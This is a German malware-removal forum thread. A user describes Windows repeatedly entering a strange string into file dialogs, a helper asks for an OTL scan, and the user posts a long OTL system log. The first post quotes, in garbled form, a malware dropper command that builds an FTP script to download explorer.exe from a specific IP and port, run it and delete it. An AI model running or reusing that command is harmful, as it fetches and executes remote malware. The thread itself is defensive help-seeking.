Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
Windows entwickelt merkwürdiges Eigenleben

Windows entwickelt merkwürdiges Eigenleben


Plagegeister aller Art und deren Bekämpfung: Windows entwickelt merkwürdiges Eigenleben

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 24.10.2012, 21:06   #1
stentor
 
Windows entwickelt merkwürdiges Eigenleben - Standard

Windows entwickelt merkwürdiges Eigenleben


Hallo,

neuerdings passiert bei mir folgendes:
Zyklisch öffnet der PC unter dem gerade laufendem Programm (z.B. Acrobat Reader) "Datei öffnen" und trägt folgendes als zu öffnenden Dateinamen selbstständig ein :
"eq7echo open 176.8.67.48 24546 .. eq7echo user 29085 25577 .. eq 7echo get explorer.exe .. eq 7echo quit .. eq 7ftp ßn ßsöeq 7explorer.exe 7del eq"

Die IP ist irgendwo in der Ukraine angesiedelt. HiJackThis bemängelt nichts und der AVK 2013 auch nicht. Was kann das sein?

Alt 24.10.2012, 21:19   #2
markusg
/// Malware-holic
 
Windows entwickelt merkwürdiges Eigenleben - Standard

Windows entwickelt merkwürdiges Eigenleben


hi
hjt kann man zur auswertung nicht mehr unbedingt brauchen.
Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop
  • Starte bitte die
    OTL.exe
    .
    Vista und Win7 User mit Rechtsklick "als Administrator starten"
  • Kopiere nun den Inhalt in die
    Textbox.
Code:
ATTFilter
activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT
  • Schliesse bitte nun alle Programme. (Wichtig)
  • Klicke nun bitte auf den Quick Scan Button.
  • Kopiere
    nun den Inhalt aus OTL.txt und Extra.txt hier in Deinen Thread
__________________

__________________
Alt 25.10.2012, 09:34   #3
stentor
 
Windows entwickelt merkwürdiges Eigenleben - Standard

Windows entwickelt merkwürdiges Eigenleben


OTL Logfile:
Code:
ATTFilter
OTL logfile created on: 25.10.2012 01:13:28 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Dokumente und Einstellungen\TurboMed\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
3,00 Gb Total Physical Memory | 2,05 Gb Available Physical Memory | 68,28% Memory free
4,84 Gb Paging File | 3,61 Gb Available in Paging File | 74,52% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme
Drive C: | 149,99 Gb Total Space | 88,51 Gb Free Space | 59,01% Space Free | Partition Type: NTFS
Drive Z: | 589,53 Gb Total Space | 331,81 Gb Free Space | 56,28% Space Free | Partition Type: HGFS
 
Computer Name: IMAC | User Name: ******** | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Dokumente und Einstellungen\TurboMed\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Programme\Java\jre7\bin\jqs.exe (Oracle Corporation)
PRC - C:\Programme\TeamViewer\Version7\TeamViewer.exe (TeamViewer GmbH)
PRC - C:\Programme\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
PRC - C:\Programme\TeamViewer\Version7\tv_w32.exe (TeamViewer GmbH)
PRC - C:\Programme\StarMoney 8.0\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH)
PRC - C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
PRC - C:\Programme\VMware\VMware Tools\VMwareTray.exe (VMware, Inc.)
PRC - C:\Programme\VMware\VMware Tools\vmtoolsd.exe (VMware, Inc.)
PRC - C:\Programme\VMware\VMware Tools\vmacthlp.exe (VMware, Inc.)
PRC - C:\Programme\VMware\VMware Tools\TPAutoConnect.exe (Cortado AG)
PRC - C:\Programme\VMware\VMware Tools\TPAutoConnSvc.exe (Cortado AG)
PRC - C:\Programme\G Data\AntiVirus\AVKTray\AVKTray.exe (G Data Software AG)
PRC - C:\Programme\Gemeinsame Dateien\G Data\AVKProxy\AVKProxy.exe (G Data Software AG)
PRC - C:\Programme\Gemeinsame Dateien\G Data\GDScan\GDScan.exe (G Data Software AG)
PRC - C:\Programme\uvnc bvba\UltraVnc\winvnc.exe (UltraVNC)
PRC - C:\Programme\G Data\AntiVirus\AVK\AVKWCtl.exe (G Data Software AG)
PRC - C:\Programme\G Data\AntiVirus\AVK\AVKService.exe (G Data Software AG)
PRC - C:\Programme\Sage\SageDB 5.0\bin\mysqld-nt.exe ()
PRC - C:\Programme\FRITZ!\FriFax32.exe (AVM Berlin)
PRC - C:\Programme\FRITZ!\IWatch.exe (AVM Berlin)
PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation)
PRC - C:\Programme\avmclient\bluefritz.exe (AVM Berlin)
PRC - C:\Programme\avmclient\AvmObex.exe (AVM Berlin)
PRC - C:\Programme\avmclient\avmbtservice.exe (AVM Berlin)
PRC - C:\Programme\avmclient\AvmObexService.exe (AVM Berlin)
PRC - C:\Programme\avmclient\panapp.exe (AVM Berlin)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Programme\Gemeinsame Dateien\G Data\AVKScanP\Avast5\defs\12102400\algo.dll ()
MOD - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\PDFShell.DEU ()
MOD - C:\Programme\VMware\VMware Tools\glibmm-2.4.dll ()
MOD - C:\Programme\WinRAR\RarExt.dll ()
MOD - C:\Programme\FileZilla FTP Client\fzshellext.dll ()
MOD - C:\Programme\Sage\SageDB 5.0\bin\mysqld-nt.exe ()
MOD - C:\Programme\StarMoney 8.0\ouservice\patchw32.dll ()
MOD - C:\WINDOWS\system32\redmonnt.dll ()
MOD - C:\WINDOWS\system32\msdmo.dll ()
 
 
========== Services (SafeList) ==========
 
SRV - (HidServ) -- %SystemRoot%\System32\hidserv.dll File not found
SRV - (MozillaMaintenance) -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (JavaQuickStarterService) -- C:\Programme\Java\jre7\bin\jqs.exe (Oracle Corporation)
SRV - (TeamViewer7) -- C:\Programme\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
SRV - (StarMoney 8.0 OnlineUpdate) -- C:\Programme\StarMoney 8.0\ouservice\StarMoneyOnlineUpdate.exe (Star Finanz - Software Entwicklung und Vertriebs GmbH)
SRV - (FLEXnet Licensing Service) -- C:\Programme\Gemeinsame Dateien\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Flexera Software, Inc.)
SRV - (VMTools) -- C:\Programme\VMware\VMware Tools\vmtoolsd.exe (VMware, Inc.)
SRV - (VMware Physical Disk Helper Service) -- C:\Programme\VMware\VMware Tools\vmacthlp.exe (VMware, Inc.)
SRV - (TPVCGateway) -- C:\Programme\VMware\VMware Tools\TPVCGateway.exe (Cortado AG)
SRV - (TPAutoConnSvc) -- C:\Programme\VMware\VMware Tools\TPAutoConnSvc.exe (Cortado AG)
SRV - (Adobe LM Service) -- C:\Programme\Gemeinsame Dateien\Adobe Systems Shared\Service\Adobelmsvc.exe ()
SRV - (AVKProxy) -- C:\Programme\Gemeinsame Dateien\G Data\AVKProxy\AVKProxy.exe (G Data Software AG)
SRV - (GDScan) -- C:\Programme\Gemeinsame Dateien\G Data\GDScan\GDScan.exe (G Data Software AG)
SRV - (uvnc_service) -- C:\Programme\uvnc bvba\UltraVnc\winvnc.exe (UltraVNC)
SRV - (AVKWCtl) -- C:\Programme\G Data\AntiVirus\AVK\AVKWCtl.exe (G Data Software AG)
SRV - (AVKService) -- C:\Programme\G Data\AntiVirus\AVK\AVKService.exe (G Data Software AG)
SRV - (mi-raysat_3dsmax2013_32) -- C:\Programme\Autodesk\3ds Max 2013\NVIDIA\raysat_3dsmax2013_32server.exe ()
SRV - (odserv) -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\ODSERV.EXE (Microsoft Corporation)
SRV - (SageDB 5.0) -- C:\Programme\Sage\SageDB 5.0\bin\mysqld-nt.exe ()
SRV - (becldr3Service) -- C:\Programme\BCL Technologies\easyConverter SDK 3\Common\becldr.exe ()
SRV - (AVM BT Connection Service) -- C:\Programme\avmclient\avmbtservice.exe (AVM Berlin)
SRV - (AvmObexService) -- C:\Programme\avmclient\AvmObexService.exe (AVM Berlin)
SRV - (AVM BT PAN Service) -- C:\Programme\avmclient\panapp.exe (AVM Berlin)
SRV - (ose) -- C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE (Microsoft Corporation)
 
 
========== Driver Services (SafeList) ==========
 
DRV - (WDICA) --  File not found
DRV - (PDRFRAME) --  File not found
DRV - (PDRELI) --  File not found
DRV - (PDFRAME) --  File not found
DRV - (PDCOMP) --  File not found
DRV - (PCIDump) --  File not found
DRV - (lbrtfdc) --  File not found
DRV - (i2omgmt) --  File not found
DRV - (Cryiogonplmu) --  File not found
DRV - (Changer) --  File not found
DRV - (vmci) -- C:\WINDOWS\system32\drivers\vmci.sys (VMware, Inc.)
DRV - (vmx_svga) -- C:\WINDOWS\system32\drivers\vmx_svga.sys (VMware, Inc.)
DRV - (vmxnet) -- C:\WINDOWS\system32\drivers\vmxnet.sys (VMware, Inc.)
DRV - (vmmouse) -- C:\WINDOWS\system32\drivers\vmmouse.sys (VMware, Inc.)
DRV - (VMMEMCTL) -- C:\Programme\Gemeinsame Dateien\VMware\Drivers\memctl\vmmemctl.sys (VMware, Inc.)
DRV - (vmhgfs) -- C:\WINDOWS\system32\drivers\vmhgfs.sys (VMware, Inc.)
DRV - (vmscsi) -- C:\WINDOWS\system32\drivers\vmscsi.sys (VMware, Inc.)
DRV - (GRD) -- C:\WINDOWS\system32\drivers\GRD.sys (G Data Software)
DRV - (GDMnIcpt) -- C:\WINDOWS\system32\drivers\MiniIcpt.sys (G Data Software AG)
DRV - (HookCentre) -- C:\WINDOWS\system32\drivers\HookCentre.sys (G Data Software AG)
DRV - (GDBehave) -- C:\WINDOWS\system32\drivers\GDBehave.sys (G Data Software AG)
DRV - (GDTdiInterceptor) -- C:\WINDOWS\system32\drivers\GDTdiIcpt.sys (G Data Software AG)
DRV - (gameenum) -- C:\WINDOWS\system32\drivers\gameenum.sys (Microsoft Corporation)
DRV - (bfhubase) -- C:\WINDOWS\system32\drivers\bfhubase.sys (AVM Berlin)
DRV - (CAPI_CIP) -- C:\WINDOWS\system32\drivers\capi_cip.sys (AVM Berlin)
DRV - (AVMBTPARALLEL) -- C:\WINDOWS\system32\drivers\avmbtpar.sys (AVM GmbH)
DRV - (AVMBTSERIAL) -- C:\WINDOWS\system32\drivers\avmbtser.sys (AVM GmbH)
DRV - (AVMCOWAN) -- C:\WINDOWS\system32\drivers\avmcowan.sys (AVM GmbH)
DRV - (AVMBTSND) -- C:\WINDOWS\system32\drivers\avmbtsnd.sys (AVM GmbH)
DRV - (NETBFPAN) -- C:\WINDOWS\system32\drivers\netbfpan.sys (AVM Berlin)
DRV - (BFHU_CFG) -- C:\WINDOWS\system32\drivers\bfhu_cfg.sys (AVM Berlin)
DRV - (es1371) -- C:\WINDOWS\system32\drivers\es1371mp.sys (Creative Technology Ltd.)
DRV - (HPW5ECP) -- C:\WINDOWS\system32\drivers\HPW5ECP.sys (Hewlett-Packard Company)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,---------Start Page = hxxp://de.ask.com/?l=dis&o=15996&gct=hp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 5B B1 C6 EF 93 5C CD 01  [binary data]
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultEngine: "Yahoo"
FF - prefs.js..browser.search.defaultengine: "Ask.com"
FF - prefs.js..browser.search.defaultenginename: "Ask.com"
FF - prefs.js..browser.search.order.1: "Ask.com"
FF - prefs.js..browser.search.param.yahoo-fr: "chrf-flv"
FF - prefs.js..browser.search.param.yahoo-fr-cjkt: "chrf-flv"
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.update: false
FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de"
FF - prefs.js..extensions.enabledAddons: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:2.0.15
FF - prefs.js..extensions.enabledAddons: {73a6fe31-595d-460b-a920-fcc0f8843232}:2.5.8
FF - prefs.js..keyword.URL: "hxxp://de.search.yahoo.com/search?ei=UTF-8&fr=ytff-ytbm&p="
 
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_4_402_287.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.7.2: C:\Programme\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Programme\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Programme\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Programme\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.1\extensions\\Components: C:\Programme\Mozilla Firefox\components [2012.10.12 06:46:55 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.1\extensions\\Plugins: C:\Programme\Mozilla Firefox\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 16.0.1\extensions\\Components: C:\Programme\Mozilla Thunderbird\components [2012.06.20 23:52:19 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 16.0.1\extensions\\Plugins: C:\Programme\Mozilla Thunderbird\plugins
 
[2012.05.16 21:21:06 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Extensions
[2012.10.23 23:51:53 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Firefox\Profiles\jh276s6t.default\extensions
[2012.10.12 01:52:06 | 000,000,000 | ---D | M] (Yahoo! Toolbar) -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Firefox\Profiles\jh276s6t.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[2012.10.23 23:51:53 | 000,529,693 | ---- | M] () (No name found) -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Firefox\Profiles\jh276s6t.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2012.09.24 22:06:36 | 000,698,867 | ---- | M] () (No name found) -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Firefox\Profiles\jh276s6t.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi
[2012.05.24 01:57:16 | 000,002,337 | ---- | M] () -- C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Mozilla\Firefox\Profiles\jh276s6t.default\searchplugins\askcom.xml
[2012.10.12 06:46:48 | 000,000,000 | ---D | M] (No name found) -- C:\Programme\Mozilla Firefox\extensions
[2012.10.12 06:46:48 | 000,000,000 | ---D | M] (G Data BankGuard) -- C:\Programme\Mozilla Firefox\extensions\{906305f7-aafc-45e9-8bbd-941950a84dad}
[2012.10.12 06:46:55 | 000,261,600 | ---- | M] (Mozilla Foundation) -- C:\Programme\mozilla firefox\components\browsercomps.dll
[2012.03.13 07:23:34 | 000,001,392 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\amazondotcom-de.xml
[2012.08.29 23:57:03 | 000,002,465 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\bing.xml
[2012.03.13 07:23:34 | 000,001,153 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\eBay-de.xml
[2012.03.13 07:23:34 | 000,006,805 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\leo_ende_de.xml
[2012.03.13 07:23:34 | 000,001,178 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\wikipedia-de.xml
[2012.03.13 07:23:34 | 000,001,105 | ---- | M] () -- C:\Programme\mozilla firefox\searchplugins\yahoo-de.xml
 
O1 HOSTS File: ([2008.04.14 14:00:00 | 000,000,820 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (G Data BankGuard) - {BA3295CF-17ED-4F49-9E95-D999A0ADBFDC} - C:\Programme\Gemeinsame Dateien\G Data\AVKProxy\BanksafeBHO.dll (G Data Software AG)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4 - HKLM..\Run: [AVMBlueClient] C:\Programme\avmclient\bluefritz.exe (AVM Berlin)
O4 - HKLM..\Run: [AVMBLUEOBEX] C:\Programme\avmclient\AvmObex.exe (AVM Berlin)
O4 - HKLM..\Run: [BluetoothAuthenticationAgent] C:\WINDOWS\System32\bthprops.cpl (Microsoft Corporation)
O4 - HKLM..\Run: [G Data AntiVirus Tray Application] C:\Programme\G Data\AntiVirus\AVKTray\AVKTray.exe (G Data Software AG)
O4 - HKLM..\Run: [VMware Tools] C:\Programme\VMware\VMware Tools\VMwareTray.exe (VMware, Inc.)
O4 - HKLM..\Run: [VMware User Process] C:\Programme\VMware\VMware Tools\vmtoolsd.exe (VMware, Inc.)
O4 - Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\Adobe Gamma Loader.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\ISDNWatch.lnk = C:\Programme\FRITZ!\IWatch.exe (AVM Berlin)
O4 - Startup: C:\Dokumente und Einstellungen\TurboMed\Startmenü\Programme\Autostart\Dropbox.lnk = C:\Dokumente und Einstellungen\TurboMed\Anwendungsdaten\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O4 - Startup: C:\Dokumente und Einstellungen\TurboMed\Startmenü\Programme\Autostart\FRITZ!fax.lnk = C:\Programme\FRITZ!\FriFax32.exe (AVM Berlin)
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 91 00 00 00  [binary data]
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoSimpleNetIDList = 1
O9 - Extra 'Tools' menuitem : Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_01\bin\npjpi160_01.dll (Sun Microsystems, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\WINDOWS\system32\vsocklib.dll (VMware, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\WINDOWS\system32\vsocklib.dll (VMware, Inc.)
O15 - HKCU\..Trusted Domains: localhost ([]* in Lokales Intranet)
O15 - HKCU\..Trusted Domains: Stentor ([]* in Lokales Intranet)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_01-windows-i586.cab (Reg Error: Value error.)
O16 - DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_01-windows-i586.cab (Java Plug-in 1.6.0_01)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_01-windows-i586.cab (Java Plug-in 1.6.0_01)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{8AF41337-AD02-435D-AFCF-162D9BA6BC98}: NameServer = 192.168.1.250
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\WINDOWS\system32\userinit.exe) - C:\WINDOWS\system32\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\TPSvc: DllName - (TPSvc.dll) - C:\WINDOWS\System32\TPSvc.dll (Cortado AG)
O20 - Winlogon\Notify\VMUpgradeAtShutdown: DllName - (VMUpgradeAtShutdownWXP.dll) - C:\WINDOWS\System32\VMUpgradeAtShutdownWXP.dll (VMware, Inc.)
O24 - Desktop Components:0 (Die derzeitige Homepage) - About:Home
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2012.05.30 10:20:27 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O32 - AutoRun File - [2012.10.19 14:30:10 | 000,000,031 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
ActiveX: {075AA014-9C3A-10F7-B5B6-7EEEB1EBF606} - Themes Setup
ActiveX: {0808CE95-BB36-D5D0-51D5-DEF95797187A} - Internet Explorer
ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)
ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vektorgrafik-Rendering (VML)
ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - NetShow
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4
ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {36f8ec70-c29a-11d1-b5c7-0000f8051515} - Dynamic HTML-Datenbindung für Java
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe
ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework
ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Erweitertes Authoring
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install
ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT
ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {463E4B4E-84A3-08EE-66C9-53ADE6B7A152} - Microsoft Windows Media Player 6.4
ActiveX: {48EB2EF0-4866-4B06-225C-97FA4BCEEA7E} - Microsoft Windows Media Player 6.4
ActiveX: {4f216970-c90c-11d1-b5c7-0000f8051515} - DirectAnimation Java Classes
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.7
ActiveX: {5056b317-8d4c-43ee-8543-b9d1e234b8f4} - Sicherheitsupdate für Windows XP (KB923789)
ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser
ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {67423586-2BF0-2C89-8152-98337E5B3539} - Internet Explorer
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {73fa19d0-2d75-11d2-995d-00c04f98bbc9} - Web Folders
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install
